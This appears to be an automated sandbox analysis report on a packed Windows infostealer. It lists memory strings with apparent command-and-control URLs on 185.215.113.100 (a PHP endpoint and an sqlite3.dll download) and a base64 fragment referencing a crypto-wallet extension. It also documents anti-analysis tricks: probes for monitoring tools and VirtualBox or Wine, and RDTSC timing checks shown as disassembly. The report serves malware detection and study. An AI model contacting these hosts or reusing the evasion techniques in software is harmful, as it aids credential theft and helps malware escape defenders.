Source: file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpx
Source: file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.1000d60be0de163924d/sqlite3.dllY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZG
Source: file.exe, 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100:
Source: file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100GIJ
Source: file.exe, 00000000.00000002.2800489909.0000000000321000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2800489909.000000000035C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100s.exe
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000002.2821491143.0000000061ED3000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 1600

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: pxgxvnlp ZLIB complexity 0.9949553329854669

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/6@0/1

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\KAXVOMTB.htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3424

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\633db15d-32df-4a6f-83e6-adb215d649b3

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe

Virustotal: Detection: 41%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 1600

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1751552 > 1048576

Source: file.exe

Static PE information: Raw size of pxgxvnlp is bigger than: 0x100000 < 0x194400

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.320000.0.unpack :EW;.rsrc :W;.idata :W; :EW;pxgxvnlp:EW;bshzvtbg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;pxgxvnlp:EW;bshzvtbg:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1b0ae6 should be: 0x1b4d45

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: pxgxvnlp
Source: file.exe	Static PE information: section name: bshzvtbg
Source: file.exe	Static PE information: section name: .taggant

Source: file.exe

Static PE information: section name: pxgxvnlp entropy: 7.954604201720513

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6DD38B second address: 6DD3A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jc 00007F56AD341B16h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6DD3A8 second address: 6DD3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F56ACB76F36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6DC696 second address: 6DC6A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F56AD341B16h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6DC94C second address: 6DC95F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F3Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6DCC01 second address: 6DCC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F56AD341B22h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F56AD341B48h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E04B1 second address: 6E04E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jns 00007F56ACB76F44h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E04E4 second address: 6E04E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E0724 second address: 6E072E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F56ACB76F36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E0816 second address: 6E081A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E08CF second address: 6E08D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E08D3 second address: 6E08D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E08D9 second address: 6E097D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F56ACB76F48h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 2477420Ah 0x00000012 stc 0x00000013 push 00000003h 0x00000015 movsx esi, dx 0x00000018 push 00000000h 0x0000001a cmc 0x0000001b push 00000003h 0x0000001d ja 00007F56ACB76F39h 0x00000023 mov edi, dword ptr [ebp+122D398Bh] 0x00000029 call 00007F56ACB76F39h 0x0000002e jno 00007F56ACB76F56h 0x00000034 push eax 0x00000035 jmp 00007F56ACB76F3Dh 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e jnl 00007F56ACB76F44h 0x00000044 mov eax, dword ptr [eax] 0x00000046 push eax 0x00000047 push edx 0x00000048 jg 00007F56ACB76F3Ch 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E097D second address: 6E09D5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F56AD341B18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007F56AD341B20h 0x00000013 pop eax 0x00000014 mov esi, 25841C13h 0x00000019 pushad 0x0000001a mov edx, dword ptr [ebp+122D18B7h] 0x00000020 mov edi, dword ptr [ebp+122D39BBh] 0x00000026 popad 0x00000027 lea ebx, dword ptr [ebp+124503C3h] 0x0000002d movzx esi, si 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F56AD341B28h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FE8D8 second address: 6FE8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FE8DE second address: 6FE8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F56AD341B23h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FEBFB second address: 6FEC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F3Fh 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FEC0F second address: 6FEC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F56AD341B16h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FED94 second address: 6FED98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FED98 second address: 6FED9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FED9E second address: 6FEDA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FEECB second address: 6FEEF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B1Bh 0x00000007 ja 00007F56AD341B16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F56AD341B1Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FEEF1 second address: 6FEEF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FEEF5 second address: 6FEF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F56AD341B22h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FEF0F second address: 6FEF47 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F56ACB76F36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F56ACB76F36h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007F56ACB76F3Fh 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F56ACB76F42h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF0D1 second address: 6FF0D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF22B second address: 6FF233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF233 second address: 6FF244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56AD341B1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF369 second address: 6FF36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF36F second address: 6FF375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C1FF0 second address: 6C1FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C1FF4 second address: 6C1FFE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F56AD341B16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C1FFE second address: 6C2004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF7A1 second address: 6FF7BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F56AD341B22h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF7BB second address: 6FF7BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FFD97 second address: 6FFDC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F56AD341B1Ah 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F56AD341B29h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FFDC3 second address: 6FFDC8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FFF2F second address: 6FFF43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F56AD341B1Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FFF43 second address: 6FFF5A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F56ACB76F38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F56ACB76F36h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FFF5A second address: 6FFF5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FFF5E second address: 6FFF62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6D80D5 second address: 6D80E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56AD341B1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 709ABD second address: 709ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
